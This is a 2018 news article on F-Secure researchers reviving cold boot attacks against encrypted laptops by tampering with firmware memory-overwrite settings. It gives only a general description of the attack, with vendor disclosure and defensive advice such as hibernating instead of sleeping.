Researchers bring back cold boot attacks on modern computers

Doris Richards
September 16, 2018

Within minutes, the attackers can reportedly move past the security layers of a Windows or Mac PC to steal data, even if they are fully-encrypted. Cold boot attacks can steal data on a computer's RAM, where sensitive information is briefly stored after a forced reboot.

"It's not exactly easy to do, but it's not a hard enough issue to find and exploit for us to ignore the probability that some attackers have already figured this out", said F-Secure Principal Security Consultant Olle Segerdahl, one of the researchers.

Cold boot attacks have been around since 2008 and involve stealing information stored on a computer that hasn't been shutdown properly, or left in a vulnerable sleeping state.

Segerdahl and Saarinen developed a tool that could re-write the mitigation settings in memory, which would disable memory overwriting and allow them to boot from an external device that could read the target system's memory.

Over the years, OS makers and hardware vendors have shipped various security measures to reduce the impact of cold boot attacks, even if they happen.

"It's the kind of thing that attackers looking for bigger phish, like a bank or large enterprise, will know how to use", he added.

The attack exploits the fact that the firmware settings governing the behavior of the boot process are not protected against manipulation by a physical attacker.

But the F-Secure researchers found a way to bypass that memory overwrite by additionally attacking the BIOS/UEFI firmware that boots the machine and overwrites the memory.

The attacker then plugs in a USB stick containing a Linux operating system and boots the machine from that.

Segerdahl also added that there's no reliable way for organisations to know their data is safe if a computer goes missing, and because almost all company laptops will have things like access credentials for corporate networks, it gives attackers a consistent and reliable way to compromise corporate targets. "There's no easy fix for this issue either, so it's a risk that companies are going to have to address on their own".

The researchers said that they have warned major companies such as Microsoft, Apple, and Intel about their latest findings. The cybersecurity company recommends that you configure your laptops to automatically shut down or hibernate instead of having it entire sleep mode when you close your screen. Educating workers, especially executives and employees who travel, about cold boot attacks and similar threats is also important. "IT security and incident response teams should rehearse this scenario and make sure that the company's workforce knows to notify IT immediately if a device is lost or stolen", says Olle. "We encourage customers to practice good security habits, including preventing unauthorized physical access to their device".

Other reports by Iphone Fresh

Discuss This Article